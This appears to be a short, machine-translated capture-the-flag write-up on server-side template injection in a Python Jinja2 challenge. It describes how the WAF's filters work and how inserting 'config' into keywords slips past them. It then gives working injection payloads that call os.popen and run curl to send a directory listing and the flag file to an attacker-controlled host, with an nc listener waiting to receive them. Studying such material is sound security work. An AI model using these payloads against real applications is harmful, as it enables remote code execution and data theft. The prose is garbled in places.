Input data have echo to see the return header is written in python background, speculation has SSTI (plus an error and a php index.php routing modes do not know if I have a master fool -) then followed around the WAF, I wrote two filters, a filter is a strong match {{and}}, the purpose is to let you master a remote SSTI hit the flag on their own server.
Then a simple word matching filters os and other sensitive character, as long as the FUZZ, another experiment a bit, you will find that most poc do not have access config and filter in the bottom than can be used to bypass the filter.
Server listens nc -lvp port
Root directory check flag: {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d ls / | grep flag;') %}1{% endiconfigf %}
read flag:
{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d cat /flag_1s_Hera;') %}1{% endiconfigf %}
They saw a good referral link ~ ~
Python template injection (SSTI) depth study
Flask / Jinja2 template inject some bypass posture
